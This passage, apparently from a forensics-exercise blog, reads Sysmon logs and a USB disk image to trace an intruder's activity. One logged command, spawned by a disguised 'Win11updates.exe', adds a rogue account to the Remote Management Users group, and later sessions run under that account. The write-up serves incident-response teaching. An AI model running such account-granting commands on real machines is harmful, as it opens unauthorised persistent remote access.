<b><span style="color: #fcff01;"><span> CommandLine C:\Windows\system32\cmd.exe /c "net localgroup "Remote Management Users" LittleNewman /add" </span>
</span></b><span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> ParentImage E:\Win11updates.exe </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>In the interest of space and time, there is no need to show <i>cmd.exe</i> spawns <i>net.exe</i> and <i>net.exe</i> spawns <i>net1.exe</i>. We should be aware of this flow by now, based on all the analysis done so far. However, if you are still interested, see the map above.</div><div><br /></div><div>We then see a file named "<i>ssms.exe</i>" which seems to be associated with "<i>Microsoft SQL Server Management Studio 19</i>" being launched. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:44.681 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b3b0-64bd-b700-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 6796 </span>
<span> Image C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe </span>
<span> FileVersion 19.1.56.0</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> Description SSMS 19 </span>
<span style="color: white;"> Product Microsoft SQL Server </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName SSMS.EXE </span>
<span style="color: white;"> CommandLine "C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe" </span>
<span style="color: white;"> CurrentDirectory C:\Windows\system32\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-795a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a79 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=EFA9FE326FD87239CD55FC6CFA2FB031,SHA256=F838835F72F3E05768530BE21E279901715B0DB2B726813658DB804FF368D58B,IMPHASH=B28D945C37B74021F14171C4E229AB7D </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>Looks like when the tool was used, it found an SQL Server at <i>10.240.240.6</i>. Remember, during the nmap scan, Newman did find port <i>1433 </i>opened on <i>10.240.240.6</i>. This port is typically associated with MSQL.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:12:27.268 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b3b0-64bd-b700-000000003100} </span>
<span style="color: white;"> ProcessId 6796 </span>
<span style="color: white;"> QueryName MSSQL-SR </span>
<span style="color: white;"> QueryStatus 0 </span>
<b><span style="color: #fcff01;"><span> QueryResults 10.240.240.6; </span>
<span> Image C:\Program Files (x86)\Microsoft SQL Server Management Studio 19\Common7\IDE\Ssms.exe </span>
</span></b><span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We now see WinRM Host process starting up. Interestingly, the user authenticating this time is <i>LittleNewman </i>against <i>Jerry PC</i>. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:10.952 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> ProcessId 4000 </span>
<span> Image C:\Windows\System32\wsmprovhost.exe</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion 10.0.22621.1485 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Host process for WinRM plug-ins </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName wsmprovhost.exe </span>
<span style="color: white;"> CommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> CurrentDirectory C:\Windows\system32\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=36DFD6343147B4172539CB023EF56485,SHA256=30C91BE613CB8BF4A882DEB2D3B77C8ABC0C41617178BA3681CFA746DFCED273,IMPHASH=35C50CC7209A454799C998CDE17C6E24 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b311-64bd-0d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 876 </span>
<span style="color: white;"> ParentImage C:\Windows\System32\svchost.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\system32\svchost.exe -k DcomLaunch -p </span>
<span style="color: white;"> ParentUser NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>We also see a Powershell script being executed and the target filename includes <i>LittleNewman</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:11.047 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ProcessId 4000 </span>
<span style="color: white;"> Image C:\Windows\system32\wsmprovhost.exe </span>
<b><span style="color: #fcff01;"><span> TargetFilename C:\Users\LittleNewman.JERRY-PC\AppData\Local\Temp\__PSScriptPolicyTest_21oycspq.d2l.ps1 </span>
</span></b><span style="color: white;"> CreationUtcTime 2023-07-23 23:13:11.047 </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
</pre></div>
</div><div><br /></div><div>We are now beginning to see some of the evidence we saw earlier via the packet analysis. Below we see the "<i>whoami</i>" command was run. Notice all of this is being done using the <i>LittleNewman </i>account.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:16.542 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b40c-64bd-c300-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 1852 </span>
<span> Image C:\Windows\System32\whoami.exe </span></b></span>
<span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description whoami - displays logged on user information </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName whoami.exe </span>
<span style="color: white;"> CommandLine "C:\Windows\system32\whoami.exe" </span>
<span style="color: white;"> CurrentDirectory C:\Users\LittleNewman.JERRY-PC\Documents\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=E0F37DB23E4F3163159A815610DF8CF2,SHA256=574BC2A2995FE2B1F732CCD39F2D99460ACE980AF29EFDF1EB0D3E888BE7D6F0,IMPHASH=62935820E434AF643547B7F5F5BD0292 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ParentProcessId 4000 </span>
<span style="color: #fcff01;"><b><span> ParentImage C:\Windows\System32\wsmprovhost.exe </span>
</b></span><span style="color: white;"> ParentCommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> ParentUser JERRY-PC\LittleNewman </span>
</pre></div>
</div><div><br /></div><div><div>Next attempt to validate the hostname. Once again, all of this is being done via the PS Remoting.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:19.898 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b40f-64bd-c500-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 8172 </span>
</b></span><b><span style="color: #fcff01;"><span> Image C:\Windows\System32\HOSTNAME.EXE </span>
</span></b><span style="color: white;"> FileVersion 10.0.22621.1 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Hostname APP </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName hostname.exe </span>
<span style="color: white;"> CommandLine "C:\Windows\system32\HOSTNAME.EXE" </span>
<span style="color: white;"> CurrentDirectory C:\Users\LittleNewman.JERRY-PC\Documents\ </span>
<span style="color: white;"> User JERRY-PC\LittleNewman </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b406-64bd-62c6-1b0000000000} </span>
<span style="color: white;"> LogonId 0x1bc662 </span>
<span style="color: white;"> TerminalSessionId 0 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=26867C731CF949313F118FA0911789CB,SHA256=193D56937965C2EECC6556619CAC6B6CE7ADB1827D12830BFED1A7B038288613,IMPHASH=8CB84C534505B1E47EF25FA2CD9A16BB </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b406-64bd-c100-000000003100} </span>
<span style="color: white;"> ParentProcessId 4000 </span>
<b><span style="color: #fcff01;"><span> ParentImage C:\Windows\System32\wsmprovhost.exe </span>
</span></b><span style="color: white;"> ParentCommandLine C:\Windows\system32\wsmprovhost.exe -Embedding </span>
<span style="color: white;"> ParentUser JERRY-PC\LittleNewman </span>
</pre></div>
</div><div><br /></div><div><div><span style="font-size: large;"><b><br /></b></span></div><div><span style="font-size: large;"><b>Transitioning to the USB Disk Analysis</b></span></div></div><div><br /></div><div><div>Get the MD5 Hash of the USB image provided</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum usbstick.vhd </span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd</span>
</pre></div>
</div><div><br /></div><div><div>Make a copy of the USB image.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cp usbstick.vhd usbstick.vhd.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Confirm that the MD5 sum of the two files are the same.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum *</span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd</span>
<span style="color: white;">1ecc5c7b011770d185b714f6c6d7de0a usbstick.vhd.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Get some information on the disk using the Linux file command.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ file usbstick.vhd | fmt</span>
<span style="color: white;">usbstick.vhd: DOS/MBR boot sector MS-MBR Windows 7 english at offset 0x163</span>
<span style="color: white;">"Invalid partition table" at offset 0x17b "Error loading operating system"</span>
<span style="color: white;">at offset 0x19a "Missing operating system", disk signature 0xcac87e69;</span>
<span style="color: white;">partition 1 : ID=0x7, start-CHS (0x0,2,3), end-CHS (0x5,254,57),</span>
<span style="color: white;">startsector 128, 96256 sectors</span>
</pre></div>
</div><div><br /></div><div><div>Using <i>exiftool </i>to take a different look.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ exiftool ../usbstick.vhd </span>
<span style="color: white;">ExifTool Version Number : 12.63</span>
<span style="color: white;">File Name : usbstick.vhd</span>
<span style="color: white;">Directory : ..</span>
<span style="color: white;">File Size : 52 MB</span>
<span style="color: white;">File Modification Date/Time : 2023:07:23 19:28:58-04:00</span>
<span style="color: white;">File Access Date/Time : 2023:07:28 09:32:04-04:00</span>
<span style="color: white;">File Inode Change Date/Time : 2023:07:25 14:45:15-04:00</span>
<span style="color: white;">File Permissions : -rw-r--r--</span>
<span style="color: white;">Error : Unknown file type</span>
</pre></div>
</div><div><br /></div><div><div>Yet another perspective</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ fdisk --list usbstick.vhd</span>
<span style="color: white;">Disk usbstick.vhd: 50 MiB, 52429312 bytes, 102401 sectors</span>
<span style="color: white;">Units: sectors of 1 * 512 = 512 bytes</span>
<span style="color: white;">Sector size (logical/physical): 512 bytes / 512 bytes</span>
<span style="color: white;">I/O size (minimum/optimal): 512 bytes / 512 bytes</span>
<span style="color: white;">Disklabel type: dos</span>
<span style="color: white;">Disk identifier: 0xcac87e69</span>
<span style="color: white;">Device Boot Start End Sectors Size Id Type</span>
<span style="color: white;">usbstick.vhd1 128 96383 96256 47M 7 HPFS/NTFS/exFAT</span>
</pre></div>
</div><div><div>Working on the<i> usbstick.vhd </i>file with Autopsy 4.20.0</div><div><br /></div><div>Created a new case in Autopsy 4.20.0</div><div><br /></div><div>Added a data source</div><div><br /></div><div>AT first glance, we see the disk has 3 volumes of which 2 are unallocated:<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgto8NniAVoyam0kl-O8H2r48KVCF1wC-dLFOSJb0jgKducyOFO1kVglXDmoImV4yQ8J_VnIWGIEutW8elkjIfNYlFw7vtRNWoU95ADqX6PkAmdnz64ZjmF0j6uuJonCopsA-S-CdcNDG46EyGY8SEXyOSNGPjOKe78WluwUJjBSrjRBjTop4h_wYBcY7g/s1112/volumes.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1112" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgto8NniAVoyam0kl-O8H2r48KVCF1wC-dLFOSJb0jgKducyOFO1kVglXDmoImV4yQ8J_VnIWGIEutW8elkjIfNYlFw7vtRNWoU95ADqX6PkAmdnz64ZjmF0j6uuJonCopsA-S-CdcNDG46EyGY8SEXyOSNGPjOKe78WluwUJjBSrjRBjTop4h_wYBcY7g/w640-h152/volumes.png" width="640" /></a></div><br /></div><div><br /></div><div><br />Expanding volume 2 ...<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgAUh1ByrZZHdD76rRjjpo937ncNy-MAt6M8DRmO-I0boagOKKFvVWGFJUCdI1mvm3R-y088Jrm7xlkQvIhszNDqreNa2um4roHgF4gSCkA6lx3EoKBX4tRYSA0G71o3551hNfSbIIvQsW04RLjyaTtDLoSVjYJWGzyHorFF1cv85seLEfwTA_Zmb9Zb8/s319/Volume2-expanded.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="319" data-original-width="301" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgAUh1ByrZZHdD76rRjjpo937ncNy-MAt6M8DRmO-I0boagOKKFvVWGFJUCdI1mvm3R-y088Jrm7xlkQvIhszNDqreNa2um4roHgF4gSCkA6lx3EoKBX4tRYSA0G71o3551hNfSbIIvQsW04RLjyaTtDLoSVjYJWGzyHorFF1cv85seLEfwTA_Zmb9Zb8/w604-h640/Volume2-expanded.PNG" width="604" /></a></div><br /></div><div><br /></div><div>Looking at the files found, we see 2 images and 3 plain text files being reported.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiosKlEgULuDCQm8-_d7sq9eZrsBg7mF8d4jPX_7M_9kGMcU3_pbreFpVmkej-zij1EEeFnpKG1G_-woHe6DPuVR4cIObDaBqkqS-Zgd9HOYcjaZERd4k_D1GkcmwvIaMpgwQEyHdNovdZu9WdTqRROQHzXu2LqNHFDb2IW9YqGEW9w5iWAKbwYHJJ384/s365/Files%20with%20.txt%20extension.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiosKlEgULuDCQm8-_d7sq9eZrsBg7mF8d4jPX_7M_9kGMcU3_pbreFpVmkej-zij1EEeFnpKG1G_-woHe6DPuVR4cIObDaBqkqS-Zgd9HOYcjaZERd4k_D1GkcmwvIaMpgwQEyHdNovdZu9WdTqRROQHzXu2LqNHFDb2IW9YqGEW9w5iWAKbwYHJJ384/s16000/Files%20with%20.txt%20extension.PNG" /></a></div><br /><div><br /></div><div>Looking at the SID on the $RECYCLE.BIN we see a<i> SID: S-1-5-21-2404277346-2099594652-1884649452-1010.</i></div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA__JUM240ZAgsoqzIGe_DFT05cEcwVmaxcWqf_8Y3fXecgv666otrqln1TBZ3Of3lFTfVY7up7eLtkLILSyTAV3KAUC3rVrVdIXoIp-cl15yA1nzeB8hBf2jGnOCze8jiKaAMlRrQlIoX0Cun0-3NbMxCgIKuQaAg2KNj_5ngZQuqkTaCKBWvXcn3RQo/s746/recycle-bin-SID.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="333" data-original-width="746" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA__JUM240ZAgsoqzIGe_DFT05cEcwVmaxcWqf_8Y3fXecgv666otrqln1TBZ3Of3lFTfVY7up7eLtkLILSyTAV3KAUC3rVrVdIXoIp-cl15yA1nzeB8hBf2jGnOCze8jiKaAMlRrQlIoX0Cun0-3NbMxCgIKuQaAg2KNj_5ngZQuqkTaCKBWvXcn3RQo/w640-h286/recycle-bin-SID.PNG" width="640" /></a></div><br /><br /></div><div>Looking at the log files, we see this SID is associated with the host at <i>10.240.240.5</i> which is associated with <i>Newman's </i>computer and account.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat 10-240-240-5-events.csv | grep "S-1-5-21-2404277346-2099594652-1884649452-1010" | head --lines=5 </span>
<span style="color: white;">TargetObject: </span><span style="color: #fcff01;"><b>HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</b></span><span style="color: white;">\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefile</span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
<span><span style="color: white;">TargetObject: </span><b><span style="color: #fcff01;">HKU\S-1-5-21-2404277346-2099594652-1884649452-1010</span></b><span style="color: white;">_Classes\grvopen\shell\open\command\(Default)</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking into the file<i> $IVM18SN.txt </i>we see "<i>D:\mynotes.txt</i>"<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjiiSQJ2zbAid4YX9HXF5m3a2YhAttTxsB_xIV72v1GL92dObeLijlMN2mrJ1iOYQQhyid9SeA_JW05Y0_gGQTrOLcpF4FGuGiapx_3AGYSi-jdYsSZTq2y4VIfx39DZ3pv1XI79M7NRTXdQ_Tt9bu0Dp9anxV4yyLIiQ-chlkFIisXuwkP9WvV81qE/s473/mynotes.txt%20image.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="409" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfjiiSQJ2zbAid4YX9HXF5m3a2YhAttTxsB_xIV72v1GL92dObeLijlMN2mrJ1iOYQQhyid9SeA_JW05Y0_gGQTrOLcpF4FGuGiapx_3AGYSi-jdYsSZTq2y4VIfx39DZ3pv1XI79M7NRTXdQ_Tt9bu0Dp9anxV4yyLIiQ-chlkFIisXuwkP9WvV81qE/w554-h640/mynotes.txt%20image.PNG" width="554" /></a></div> </div><div><br /></div><div>But where is that file. I do not see that file at first glance on the disk.</div><div><br /></div><div>Looking at the file <i>$RVM18SN.tx</i>t, we see what seems to be a password.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR-0LbbJN0mJ-EP2c8pWzMiPhYvIbLzwaz3QLjgVZRigjkkfkZ0R-o3iLM9BfOJeUE5N7jlYmN8jGweaDP24xB_YGo7JEkUI7_jUhgdtCQAlmTDfcVe374hZwcnUXZxvWlZqjWJmdFuDVquYK39gjSP334l9EhsCMlSJkBHmf8J-JrVWZNrBBokvnwc8o/s638/I%20guess%20I%20will%20choose%20this%20password.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="638" height="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR-0LbbJN0mJ-EP2c8pWzMiPhYvIbLzwaz3QLjgVZRigjkkfkZ0R-o3iLM9BfOJeUE5N7jlYmN8jGweaDP24xB_YGo7JEkUI7_jUhgdtCQAlmTDfcVe374hZwcnUXZxvWlZqjWJmdFuDVquYK39gjSP334l9EhsCMlSJkBHmf8J-JrVWZNrBBokvnwc8o/w640-h486/I%20guess%20I%20will%20choose%20this%20password.PNG" width="640" /></a></div><br /></div><div><br /></div><div>The creation of this content is attributed to <i>Newman </i>because of the SID.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdazra89hL2t3LplI1LM2unOwwuLC2sBaDOG93crqQ5q8XxhJzcRMlZnrgSjWTlCoM4aODf5HFefM9LnULSxdYQ-TmyVU5In1kA7SBwmzWraeLemQLA6AKmuD3Ee_KX3ICMohqBTk3Cmpgcw0j6T-hAKXT8KlTiLJ_-qEjeR3BqW_lv7Uv4RR4rSwAPyA/s753/Attribution%20of%20file%20creation%20to%20user%20with%20SID-1010.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="753" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdazra89hL2t3LplI1LM2unOwwuLC2sBaDOG93crqQ5q8XxhJzcRMlZnrgSjWTlCoM4aODf5HFefM9LnULSxdYQ-TmyVU5In1kA7SBwmzWraeLemQLA6AKmuD3Ee_KX3ICMohqBTk3Cmpgcw0j6T-hAKXT8KlTiLJ_-qEjeR3BqW_lv7Uv4RR4rSwAPyA/w640-h516/Attribution%20of%20file%20creation%20to%20user%20with%20SID-1010.PNG" width="640" /></a></div></div><div><br /></div><div>Learning a little bit more about this file via the "<i>Data Artifacts</i>" tab, we see originally it seemed to have been in the "<i>d:\mynotes.txt</i>" file</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCA2Z2Jq0RuIji2G_0puZZbIKgfgiOVNuovtIS8hfWps-rrVNPr03NBWkhg9yeSVIqm-4TTh8tydEyqLvxAgAlhp_136j2dfb1B-LfUdq2_n-I4iU4-nAVaKT_JXPj6wQsK0vnNgnoOR0TdwgvB-HZsQBH-SDhYXJiYm_nKcZvNCDUY3MF72pm2YMAds/s1092/Data%20Artificats%20for%20mynotes.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="1092" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTCA2Z2Jq0RuIji2G_0puZZbIKgfgiOVNuovtIS8hfWps-rrVNPr03NBWkhg9yeSVIqm-4TTh8tydEyqLvxAgAlhp_136j2dfb1B-LfUdq2_n-I4iU4-nAVaKT_JXPj6wQsK0vnNgnoOR0TdwgvB-HZsQBH-SDhYXJiYm_nKcZvNCDUY3MF72pm2YMAds/w640-h308/Data%20Artificats%20for%20mynotes.PNG" width="640" /></a></div></div><div><br /></div><div><br /></div><div>We still have not seen the <i>mynotes.txt </i>file as it was found in the recycle bin which suggest it was deleted. We also know it is in the root of <i>d:\drive</i> as this was the letter provided. </div><div><br /></div><div>Looking at the root of <i>vol2 </i>as this is the only partition of interest at this time.</div><div><br /></div><div>At this point, we have found the original file and can export it.<br /><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAlEpTCliprLqUaYvkxwS3fhCKDXWfohtg8JBzJp8tSJTAAn9QQTc6dQ__cNHeh3hrO7e0jo1D3BP9YFa-GgIdsoEE8urFYZTHwlzs-Fn_gywZbnSAJargluzj8Wuu0IzSyRhNkWaUV57M_LTQx5BE92eB2KeTdVqRkHCMg_d5xcXko4cY2VON82JPNZM/s875/Recover%20Extracted%20my%20notes%20file.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="875" height="390" 